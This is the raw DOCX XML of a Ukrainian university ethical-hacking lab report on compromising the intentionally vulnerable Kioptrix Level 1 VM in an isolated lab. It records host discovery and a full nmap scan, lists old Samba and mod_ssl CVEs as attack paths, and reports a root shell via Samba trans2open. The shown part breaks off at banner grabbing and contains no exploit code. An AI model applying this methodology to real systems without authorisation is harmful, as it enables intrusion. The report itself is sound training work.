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color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Міжнародний університет інформаційних технологій (IITU)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Факультет комп’ютерних технологій та кібербезпеки — Кафедра кібербезпеки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>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p>
      <w:pPr>
        <w:spacing w:after="120" w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">EGR6301 — ЕТИЧНИЙ ХАКІНГ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Звіт з лабораторної роботи</w:t>
      </w:r>
    </w:p>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p>
      <w:pPr>
        <w:spacing w:after="60" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Лабораторна робота №5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Перелік сервісів та експлуатація невідомої цілі</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="800" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kioptrix Level 1 — Від розвідки до root-доступу | Тиждень 5 | 100 балів</w:t>
      </w:r>
    </w:p>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p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="6000"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2200"/>
        <w:gridCol w:w="3800"/>
      </w:tblGrid>
      <w:tr>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Студент:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Білозор Дмитро Олександрович</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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ID студента:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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41639</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Дисципліна:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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EGR6301 — Ethical Hacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Тиждень:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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5 (100 хвилин, 100 балів)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Ціль:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Kioptrix Level 1 (VulnHub)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Дата:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="380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pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">10.04.2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:pgSz w:w="11906" w:h="16838" w:orient="portrait"/>
          <w:pgMar w:top="1800" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:pgNumType/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>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EBF3FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="280"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Середовище: Kali Linux (192.168.56.100) ↔ Kioptrix Level 1 (192.168.56.101) | VirtualBox Host-Only</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Target OS: Red Hat Linux 7.2 (Enigma) | Kernel 2.4.7-10 | CVE шляхи: CVE-2003-0201 (Samba), CVE-2002-0082 (mod_ssl)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Результат: root shell отримано через Samba trans2open overflow | Задокументована невдача: OpenFuck</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Частина 1 — Розгортання цілі та розвідка (15 балів)</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Завдання 1.1 — Розгортання ВМ та виявлення хоста</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (5 балів)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kioptrix Level 1 було завантажено з VulnHub та імпортовано до VirtualBox. Мережевий адаптер налаштовано на режим Host-Only (мережа 192.168.56.0/24) — ту саму, що й у Kali Linux. При першому запуску ВМ не отримала IP через DHCP (відома проблема зі старими образами). Проблему вирішено видаленням та повторним додаванням мережевого адаптера у налаштуваннях VirtualBox.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для виявлення IP-адреси Kioptrix використано netdiscover, що відсканував діапазон 192.168.56.0/24 і виявив хост за адресою 192.168.56.102. Ping-тест підтвердив зв'язок між машинами.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715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28975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис. 1.1 — Виявлення Kioptrix (192.168.56.102) та успішний ping з Kali</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Kioptrix Level 1 отримав IP 192.168.56.102 через DHCP після переналаштування адаптера VirtualBox.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">netdiscover визначив MAC-адресу 08:00:27:e2:54:3e (Oracle VirtualBox NIC).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">ping: 4/4 пакети отримано, втрат немає, RTT ~0.7ms — зв'язок між машинами стабільний.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TTL=64 у ping-відповіді — характерно для Linux (не Windows TTL=128).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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Завдання 1.2 — Початкова розвідка (повний Nmap)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (10 балів)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для комплексного сканування використано прапори -sV (версії сервісів), -sC (стандартні NSE-скрипти), -O (визначення ОС) та -p- (всі 65535 портів) з --min-rate 5000 для пришвидшення. Сканування завершилося за 18 секунд.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715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48100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис. 1.2 — Повний nmap -sV -sC -O -p- 192.168.56.102</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>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spacing w:after="40" w:before="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Порт</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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spacing w:after="40" w:before="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Протокол</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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spacing w:after="40" w:before="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Стан</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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spacing w:after="40" w:before="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Сервіс</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="55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spacing w:after="40" w:before="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Версія</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22</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TCP</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open</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SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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OpenSSH 2.9p2 (protocol 1.99)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5526"/>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Apache 1.3.20 (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b</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111</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TCP</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open</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rpcbind</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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RPC #100000 (version 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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139</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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NetBIOS-SSN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5526"/>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Samba smbd 2.2.1a (workgroup: MYGROUP)</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443</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TCP</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open</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HTTPS/SSL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Apache 1.3.20 mod_ssl/2.8.4 OpenSSL/0.9.6b</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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1024</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5526"/>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RPC #100024 (version 1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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На мою думку, це типовий сервер початку 2000-х — Red Hat Linux 7.2 (Enigma), що підтверджується ядром 2.4.x та Apache 1.3.20 (2002 рік).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Система залишилася незмінною з часу розгортання: OpenSSH 2.9p2 (2002), OpenSSL 0.9.6b (2001), Samba 2.2.1a — все це EOL-версії з критичними CVE.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Найцікавіші напрямки дослідження: (1) mod_ssl 2.8.4 — потенційно вразливий до CVE-2002-0082 (OpenFuck); (2) Samba 2.2.1a на порту 139 — trans2open overflow (CVE-2003-0201); (3) SSH protocol 1.99 — підтримка SSHv1 (відомі атаки).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">RPC/rpcbind (111, 1024) вказує на потенційний NFS або інші RPC-сервіси — варто перевірити showmount.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Частина 2 — Ручний перелік сервісів (25 балів)</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Завдання 2.1 — Збір банерів за допомогою Netcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (12 балів)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Підключення 1: SSH (порт 22)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715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38375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
